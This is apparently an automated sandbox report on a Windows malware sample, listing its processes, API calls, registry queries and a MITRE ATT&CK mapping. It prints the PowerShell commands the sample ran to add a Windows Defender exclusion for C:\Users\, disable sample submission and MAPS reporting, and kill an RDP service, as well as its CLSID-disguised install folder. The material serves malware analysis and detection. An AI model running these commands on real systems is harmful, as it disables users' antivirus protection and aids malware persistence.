Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3512	Thread sleep time: -16257000s >= -30000s

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe	Code function: 5_2_00007FF73AFB3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	5_2_00007FF73AFB3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF6EF6547A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FF6EF6547A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E13A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE0E13A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E161883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE0E161883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0EB45BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE0EB45BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11EC5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE11EC5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE126D2FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE126D2FE3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE133857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFE133857B3

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: file.exe	Binary or memory string: =QemuLH
Source: file.exe, 00000001.00000002.2975102593.00000000011AA000.00000004.00000020.00020000.00000000.sdmp, dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2030990176.00000225F0D18000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.1978232330.000001FC7A52C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: main.exe, 00000017.00000002.2976072841.000001FC7A517000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll33

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

API call chain: ExitProcess graph end node

graph_23-58059

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe

Code function: 5_2_00007FF73AFBFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

5_2_00007FF73AFBFF1F

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe

Code function: 5_2_00007FF73AFB8CFC FreeLibrary,strlen,GetProcessHeap,HeapAlloc,BuildTrusteeWithSidW,BuildSecurityDescriptorW,GetProcessHeap,HeapFree,LocalFree,

5_2_00007FF73AFB8CFC

Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe	Code function: 5_2_00007FF73AFB1131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,	5_2_00007FF73AFB1131
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe	Code function: 5_2_00007FF73AFCB6A0 SetUnhandledExceptionFilter,	5_2_00007FF73AFCB6A0
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe	Code function: 5_2_00007FF73AFC05D9 SetUnhandledExceptionFilter,	5_2_00007FF73AFC05D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF6EF651131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,	23_2_00007FF6EF651131

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe

5_2_00007FF73AFB292E

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe

Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe

Code function: 5_2_00007FF73AFB6FD5 GetSystemTimeAsFileTime,

5_2_00007FF73AFB6FD5

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FFE0E136DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,

23_2_00007FFE0E136DA3

Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 3lp16vmh8u8y3z1y6.exe, 00000005.00000002.1778189859.0000021A43CD8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: MsMpEng.exe

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1358DA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFE0E1358DA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E16AEAA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFE0E16AEAA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0EB41F9A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFE0EB41F9A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11EC418A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFE11EC418A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE126D15FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFE126D15FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE133828BA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFE133828BA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1339B820 listen,htons,recv,select,	23_2_00007FFE1339B820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1339B7E8 bind,	23_2_00007FFE1339B7E8

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 Network Sniffing	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Native API	1 DLL Side-Loading	2 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Create Account	2 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 Service Execution	2 Valid Accounts	4 Windows Service	1 Timestomp	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Proxy	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	4 Windows Service	11 Process Injection	1 DLL Side-Loading	LSA Secrets	1 Network Sniffing	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	1 Services File Permissions Weakness	1 Services File Permissions Weakness	1 File Deletion	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Masquerading	DCSync	1 Network Share Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
